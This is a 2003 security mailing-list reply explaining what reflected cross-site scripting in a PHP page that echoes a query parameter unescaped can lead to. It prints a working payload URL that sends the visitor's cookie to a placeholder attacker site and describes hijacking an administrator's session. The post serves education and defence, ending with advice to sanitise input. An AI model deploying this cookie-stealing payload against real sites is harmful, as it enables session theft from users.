Re: About malicious java sciprt running...

[Shaun Colley <shaunige () yahoo co uk>]

Hey.

Having the ability to inject malicious HTML code (or
as some call them, "cross-site scripting attacks") is
not directly an issue to the security of the server
side, but can consequently lead onto the
compromisation of the server's security.  Here's an
example:

The attacker crafts an URL string containing malicious
javascript to give to the variable $a, to redirect the
social engineered user who unsuspectingly visits the
URL to the attacker's site to steal the user's cookie.

http://host/a.php?variable=";><script>document.location='http://www.attackersite.com/cookiesteal.cgi?
'%20+document.cookie</script>

The users cookie is stolen, leaving the attacker with
login credentials.

Now, this is not directly a threat to the server,
rather a potential threat to users of the site.  But
what if, for example, the attacker persuaded the
administrator to click that URL?  The administrators
session cookie would be stolen, thus resulting in a
system compromise.

Without the server-side example, the attacker still
has the ability to inject malicious code, this still
has the door open to a multitude of possibilities...

> i think... this is very~~~ common hole in many
> sites.

Yeap, way to many scripts do not sanitize user-input. 
Main rule in CGI and web development: do not trust
user-input.



Thank you for your time.
Shaun.


--- s970501 () ku edu np wrote: > Hi,
> I have a question about javascript exploits.
> suppose... somebody can put javascript and can run
> it,
> what can he do?
>
> i have a website running apache/php.
> some of pages are workin' like this...
>
> test.php?a=333
> ...
> <?php
>   ...
>   echo "$a";
>   ...
> ?>
> ...
>
> i found anybody can run javascript from this
> source...
> like test.php?a=<script>alert("hey")</script> or
> something else.
>
> but what can he do with this hole...?
> is there anything he can do in server side?
> is there any javascript can make file or see files
> in server?
>
> i think... this is very~~~ common hole in many
> sites.
>
> thanks...
---------------------------------------------------------------------------
>
----------------------------------------------------------------------------
>  

________________________________________________________________________
BT Yahoo! Broadband - Save £80 when you order online today. Hurry! Offer ends 21st December 2003. The way the internet 
was meant to be. http://uk.rd.yahoo.com/evt=21064/*http://btyahoo.yahoo.co.uk

---------------------------------------------------------------------------
----------------------------------------------------------------------------